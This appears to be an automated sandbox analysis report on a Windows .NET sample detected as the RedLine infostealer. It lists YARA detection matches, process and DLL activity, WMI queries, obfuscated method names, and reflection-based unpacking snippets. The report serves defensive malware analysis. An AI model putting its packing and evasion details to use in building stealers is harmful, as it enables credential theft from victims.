Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000359B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs chTJmCR9bS.exe
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000359B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs chTJmCR9bS.exe
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000359B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIEXPLORE.EXED vs chTJmCR9bS.exe
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000359B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\080904B0\\OriginalFilename vs chTJmCR9bS.exe
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000359B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsedge.exe> vs chTJmCR9bS.exe
Source: chTJmCR9bS.exe, 00000002.00000002.1927566473.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs chTJmCR9bS.exe
Source: chTJmCR9bS.exe, 00000002.00000002.1927999993.0000000001510000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs chTJmCR9bS.exe
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.00000000034AF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs chTJmCR9bS.exe
Source: chTJmCR9bS.exe	Binary or memory string: OriginalFilenameyZZa.exe< vs chTJmCR9bS.exe

Source: chTJmCR9bS.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.chTJmCR9bS.exe.450ad90.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.chTJmCR9bS.exe.450ad90.3.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 0.2.chTJmCR9bS.exe.450ad90.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.chTJmCR9bS.exe.43ab7e0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.chTJmCR9bS.exe.43ab7e0.4.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 0.2.chTJmCR9bS.exe.43ab7e0.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.chTJmCR9bS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 2.2.chTJmCR9bS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 2.2.chTJmCR9bS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.chTJmCR9bS.exe.450ad90.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.chTJmCR9bS.exe.450ad90.3.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 0.2.chTJmCR9bS.exe.450ad90.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.chTJmCR9bS.exe.43ab7e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.chTJmCR9bS.exe.43ab7e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 0.2.chTJmCR9bS.exe.43ab7e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.1927566473.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000002.1824869359.000000000450A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000002.1824869359.0000000004347000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: chTJmCR9bS.exe PID: 7384, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: chTJmCR9bS.exe PID: 7572, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23

Source: chTJmCR9bS.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.chTJmCR9bS.exe.5cd0000.6.raw.unpack, omAEgsLmk0rNSsw9KS.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.chTJmCR9bS.exe.3721508.2.raw.unpack, omAEgsLmk0rNSsw9KS.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.chTJmCR9bS.exe.9490000.7.raw.unpack, jYBrVYgaVhihr0xqXk.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.chTJmCR9bS.exe.9490000.7.raw.unpack, jYBrVYgaVhihr0xqXk.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.chTJmCR9bS.exe.9490000.7.raw.unpack, jYBrVYgaVhihr0xqXk.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.chTJmCR9bS.exe.9490000.7.raw.unpack, cnpOZQtnIxVr5ZpWhv.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.chTJmCR9bS.exe.9490000.7.raw.unpack, cnpOZQtnIxVr5ZpWhv.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.chTJmCR9bS.exe.4524cb0.5.raw.unpack, cnpOZQtnIxVr5ZpWhv.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.chTJmCR9bS.exe.4524cb0.5.raw.unpack, cnpOZQtnIxVr5ZpWhv.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.chTJmCR9bS.exe.4524cb0.5.raw.unpack, jYBrVYgaVhihr0xqXk.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.chTJmCR9bS.exe.4524cb0.5.raw.unpack, jYBrVYgaVhihr0xqXk.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.chTJmCR9bS.exe.4524cb0.5.raw.unpack, jYBrVYgaVhihr0xqXk.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/43@1/2

Source: C:\Users\user\Desktop\chTJmCR9bS.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\chTJmCR9bS.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Mutant created: \Sessions\1\BaseNamedObjects\LhdugJKZb

Source: C:\Users\user\Desktop\chTJmCR9bS.exe

File created: C:\Users\user\AppData\Local\Temp\tmp116D.tmp

Jump to behavior

Source: chTJmCR9bS.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: chTJmCR9bS.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\chTJmCR9bS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\chTJmCR9bS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmp118F.tmp.2.dr, tmp116E.tmp.2.dr, tmp116D.tmp.2.dr, tmp11A1.tmp.2.dr, tmp1190.tmp.2.dr, tmp117F.tmp.2.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: chTJmCR9bS.exe

ReversingLabs: Detection: 71%

Source: unknown	Process created: C:\Users\user\Desktop\chTJmCR9bS.exe "C:\Users\user\Desktop\chTJmCR9bS.exe"
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Process created: C:\Users\user\Desktop\chTJmCR9bS.exe "C:\Users\user\Desktop\chTJmCR9bS.exe"
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Process created: C:\Users\user\Desktop\chTJmCR9bS.exe "C:\Users\user\Desktop\chTJmCR9bS.exe"	Jump to behavior

Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: C:\Users\user\Desktop\chTJmCR9bS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\chTJmCR9bS.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: chTJmCR9bS.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: chTJmCR9bS.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.chTJmCR9bS.exe.5cd0000.6.raw.unpack, omAEgsLmk0rNSsw9KS.cs	.Net Code: xoWTvaNywMkV2EMeLln(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{xoWTvaNywMkV2EMeLln(typeof(IntPtr).TypeHandle),xoWTvaNywMkV2EMeLln(typeof(Type).TypeHandle)})
Source: 0.2.chTJmCR9bS.exe.3721508.2.raw.unpack, omAEgsLmk0rNSsw9KS.cs	.Net Code: xoWTvaNywMkV2EMeLln(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{xoWTvaNywMkV2EMeLln(typeof(IntPtr).TypeHandle),xoWTvaNywMkV2EMeLln(typeof(Type).TypeHandle)})

.NET source code contains potential unpacker

Source: 0.2.chTJmCR9bS.exe.5cd0000.6.raw.unpack, MainForm.cs	.Net Code: uhnzfuOu0 System.Reflection.Assembly.Load(byte[])
Source: 0.2.chTJmCR9bS.exe.3721508.2.raw.unpack, MainForm.cs	.Net Code: uhnzfuOu0 System.Reflection.Assembly.Load(byte[])
Source: 0.2.chTJmCR9bS.exe.4524cb0.5.raw.unpack, jYBrVYgaVhihr0xqXk.cs	.Net Code: nyBQYG0QSJ System.Reflection.Assembly.Load(byte[])
Source: 0.2.chTJmCR9bS.exe.9490000.7.raw.unpack, jYBrVYgaVhihr0xqXk.cs	.Net Code: nyBQYG0QSJ System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 0_2_078A4236 push dword ptr [ebp+01h]; ret	0_2_078A423B
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 0_2_078AD0B5 push edx; iretd	0_2_078AD0B8
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 2_2_06C3E5CF push es; ret	2_2_06C3E5D0
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 2_2_06C31810 push es; ret	2_2_06C31820

Source: chTJmCR9bS.exe

Static PE information: section name: .text entropy: 7.633753836163965

Source: 0.2.chTJmCR9bS.exe.5cd0000.6.raw.unpack, RSlOXPu0D84Uacoq9o.cs	High entropy of concatenated method names: 'dSEPrbjjw5Nfd', 'hetARSe6TOuXdWcNUwV', 'JW3ScdeuSw97XLUTwrK', 'rep2YXegZiT671J0sfi', 'Qm9kV7eWbsvAdJWkG4U', 'huE5g9eKYOF5IIBOPCm', 'nF8jIQeoHcjqCrCHYrC', 'q42kwTecbHcQpRPs53F'
Source: 0.2.chTJmCR9bS.exe.5cd0000.6.raw.unpack, b38guUNPeF6SV3DKHu.cs	High entropy of concatenated method names: 'o6SZV3DKH', 'qsnjwlNbE', 'hD8L4Uaco', 'C4k0oYICp', 'e4ZINr0jY', 'rgsqmk0rN', 'Dispose', 'b38NguUPe', 'mgChFQw0HJ8T8kWH5s', 'zwP7kBiLv58RkfgIpM'
Source: 0.2.chTJmCR9bS.exe.5cd0000.6.raw.unpack, omAEgsLmk0rNSsw9KS.cs	High entropy of concatenated method names: 'O9QlEUNf2SwRKuXfyy6', 'eoIIfINTGrJKbQv4Ffh', 'nKwuG1ZxdD', 'H8aGLFNbFPyr9ndHw5C', 'Iu44hyNgRelDkZMt6YT', 'ixhgOCNWu2Nj52jSE07', 'QrSq6XN6hM3TKZKB0Yk', 'JD1LZZNuuRDZTNyYZyS', 'VTplgvNKqGOOL8pTyiG', 'K1x7jbNo9hgN71DYLJ3'
Source: 0.2.chTJmCR9bS.exe.5cd0000.6.raw.unpack, Form1.cs	High entropy of concatenated method names: 'Dispose', 'WMwCh5Nlp', 'hGKdsRuQ1oxXc30xD7', 'kgkBroKW2VM2ogcDnj', 'hpcXb7Wwbb5kkeMyns', 'VSBnN06cTVemF8pxH1', 'QaqyMpoBwnf08yVTBf', 'LCNLCacEV976Blv0hu', 'Cbm0Fp2bNOXqbpEP2u', 'clQDvFUTcAXT070JZ5'
Source: 0.2.chTJmCR9bS.exe.5cd0000.6.raw.unpack, MainForm.cs	High entropy of concatenated method names: 'W1gUM3Dmg', 'MR66KHgKe', 'A003FUDMy', 'Huif9sPTl', 'B1SnrjuYo', 'mOC8YZ6Ms', 'pqN4i1b4H', 'o4TYyenZy', 'KsrhuUiXl', 'JpsklUG6Z'
Source: 0.2.chTJmCR9bS.exe.3721508.2.raw.unpack, RSlOXPu0D84Uacoq9o.cs	High entropy of concatenated method names: 'dSEPrbjjw5Nfd', 'hetARSe6TOuXdWcNUwV', 'JW3ScdeuSw97XLUTwrK', 'rep2YXegZiT671J0sfi', 'Qm9kV7eWbsvAdJWkG4U', 'huE5g9eKYOF5IIBOPCm', 'nF8jIQeoHcjqCrCHYrC', 'q42kwTecbHcQpRPs53F'
Source: 0.2.chTJmCR9bS.exe.3721508.2.raw.unpack, b38guUNPeF6SV3DKHu.cs	High entropy of concatenated method names: 'o6SZV3DKH', 'qsnjwlNbE', 'hD8L4Uaco', 'C4k0oYICp', 'e4ZINr0jY', 'rgsqmk0rN', 'Dispose', 'b38NguUPe', 'mgChFQw0HJ8T8kWH5s', 'zwP7kBiLv58RkfgIpM'
Source: 0.2.chTJmCR9bS.exe.3721508.2.raw.unpack, omAEgsLmk0rNSsw9KS.cs	High entropy of concatenated method names: 'O9QlEUNf2SwRKuXfyy6', 'eoIIfINTGrJKbQv4Ffh', 'nKwuG1ZxdD', 'H8aGLFNbFPyr9ndHw5C', 'Iu44hyNgRelDkZMt6YT', 'ixhgOCNWu2Nj52jSE07', 'QrSq6XN6hM3TKZKB0Yk', 'JD1LZZNuuRDZTNyYZyS', 'VTplgvNKqGOOL8pTyiG', 'K1x7jbNo9hgN71DYLJ3'
Source: 0.2.chTJmCR9bS.exe.3721508.2.raw.unpack, Form1.cs	High entropy of concatenated method names: 'Dispose', 'WMwCh5Nlp', 'hGKdsRuQ1oxXc30xD7', 'kgkBroKW2VM2ogcDnj', 'hpcXb7Wwbb5kkeMyns', 'VSBnN06cTVemF8pxH1', 'QaqyMpoBwnf08yVTBf', 'LCNLCacEV976Blv0hu', 'Cbm0Fp2bNOXqbpEP2u', 'clQDvFUTcAXT070JZ5'
